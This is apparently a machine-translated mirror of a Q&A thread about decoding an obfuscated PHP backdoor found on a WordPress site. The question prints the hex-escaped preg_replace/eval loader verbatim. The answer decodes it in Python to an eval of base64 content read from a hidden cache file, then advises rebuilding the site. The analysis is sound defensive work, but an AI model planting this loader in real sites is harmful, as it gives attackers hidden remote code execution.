服务器 Gind.cn
  1. 服务器 Gind.cn
  3. 我如何解码这个WordPress黑客?
Intereting Posts
新的Windows 2008磁盘分区补偿问题 – 我应该担心吗? 通过iptables在桥上扫描标记的stream量 在centos中为/ var / www /configurationproftpd用户访问 交换不在办公室,发送每个电子邮件的OOO答复 无线networking问题有什么可能的原因? 将SQL / TFS操作系统从2003年升级到2008年企业版 – 安全吗? 将AD DS Server 2003迁移到Server 2008 R2 我如何知道用户映射的networking驱动器? 如何通过VPN将远程客户端软件连接到DVR SQL Server 2005 – 请确保SQL Server代理服务正在数据库服务器上运行 远程Linux机器到Windows VPN服务器 将子域迁移到子目录,同时在单独的服务器上运行 后缀无法发送邮件与clamav 有关域和DNS的问题 如何清理被黑客户端(不是root)?

我如何解码这个WordPress黑客?

我在客户端的WordPress驱动的网站上发现了一个有问题的string,我只是想知道它做了什么。 

@preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");

有人可以概述解码这个步骤吗? 我知道preg_replace()是什么,但我不知道如何解码函数的参数,或者PHP如何处理它可以利用的东西。

有趣。 我喜欢用python来完成这种任务。 您可以在python(3.x)命令行中进行操作:

input: 

 print(b"\x40\50\x2e\53\x29\100\x69\145")

输出: 

 b'@(.+)@ie'

input: 

 print(b"\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75")

输出: 

 b'eval(base64_decode(implode("\\n",file(base64_decode("\\1")))));' L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==

那块垃圾是base64的,正如这个电话所暗示的,所以让我们继续。

input: 

 import base64 base64.b64decode(b"L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==")

输出: 

 b'/home/web/users/2029.big6/sites/big6/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57'

看起来好像是想知道发生了什么事,在网站的其他部分需要仔细看看,特别是它所引用的那个文件。 它可能充满了更多的base64编码的代码行。 我认为可以肯定的是,该网站已经被很好的妥协了,不过..把内容和清理这样的东西放在一起是一个不错的主意,并且用一个新的实例重新开始。